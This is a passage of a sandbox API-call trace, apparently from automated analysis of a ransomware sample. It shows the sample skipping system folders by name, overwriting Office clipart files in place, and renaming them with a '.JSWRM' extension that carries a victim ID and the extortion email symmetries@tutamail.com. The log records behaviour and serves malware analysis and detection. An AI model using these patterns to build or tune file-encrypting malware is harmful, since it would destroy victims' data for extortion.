Size=0x30) returned 0x22cdc8 [0098.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0098.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0098.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0098.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0098.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.253] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sprng_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sprng_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0098.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.254] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="STUBBY1.WMF", cAlternateFileName="")) returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2=".") returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="..") returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="...") returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="windows") returned -1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="recovery") returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="perflogs") returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="documents and settings") returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="system volume information") returned -1 [0098.254] lstrcmpiW (lpString1="STUBBY1.WMF", lpString2="msocache") returned 1 [0098.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY1.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY1.WMF", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STUBBY1.WMF", lpUsedDefaultChar=0x0) returned 11 [0098.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0098.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY1.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY1.WMF", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STUBBY1.WMF", lpUsedDefaultChar=0x0) returned 11 [0098.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0098.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0098.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.255] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3030) returned 1 [0098.255] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbd0) returned 0x23fc98 [0098.255] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xbd0, lpOverlapped=0x0) returned 1 [0098.257] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.257] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbd0, lpOverlapped=0x0) returned 1 [0098.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0098.257] CloseHandle (hObject=0x314) returned 1 [0098.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0098.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0098.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0098.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0098.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0098.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0098.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.258] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby1.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby1.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0098.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0098.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0098.258] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="STUBBY2.WMF", cAlternateFileName="")) returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2=".") returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="..") returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="...") returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="windows") returned -1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="recovery") returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="perflogs") returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="documents and settings") returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="system volume information") returned -1 [0098.259] lstrcmpiW (lpString1="STUBBY2.WMF", lpString2="msocache") returned 1 [0098.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY2.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY2.WMF", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STUBBY2.WMF", lpUsedDefaultChar=0x0) returned 11 [0098.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0098.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY2.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STUBBY2.WMF", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STUBBY2.WMF", lpUsedDefaultChar=0x0) returned 11 [0098.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0098.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0098.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.260] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2582) returned 1 [0098.260] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa10) returned 0x20c6c0 [0098.260] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa10, lpOverlapped=0x0) returned 1 [0098.261] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.261] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa10, lpOverlapped=0x0) returned 1 [0098.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.261] CloseHandle (hObject=0x314) returned 1 [0098.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0098.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0098.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0098.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0098.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0098.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0098.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.262] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby2.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby2.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0098.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0098.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.263] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SUMER_01.MID", cAlternateFileName="")) returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2=".") returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="..") returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="...") returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="windows") returned -1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="recovery") returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="perflogs") returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="documents and settings") returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="system volume information") returned -1 [0098.263] lstrcmpiW (lpString1="SUMER_01.MID", lpString2="msocache") returned 1 [0098.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0098.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUMER_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUMER_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUMER_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0098.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0098.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUMER_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUMER_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUMER_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0098.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0098.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0098.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.264] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14044) returned 1 [0098.264] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x36d0) returned 0x24d210 [0098.264] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x36d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x36d0, lpOverlapped=0x0) returned 1 [0098.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.266] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x36d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x36d0, lpOverlapped=0x0) returned 1 [0098.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.267] CloseHandle (hObject=0x314) returned 1 [0098.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0098.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0098.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0098.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0098.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0098.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.267] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sumer_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sumer_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0098.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.268] 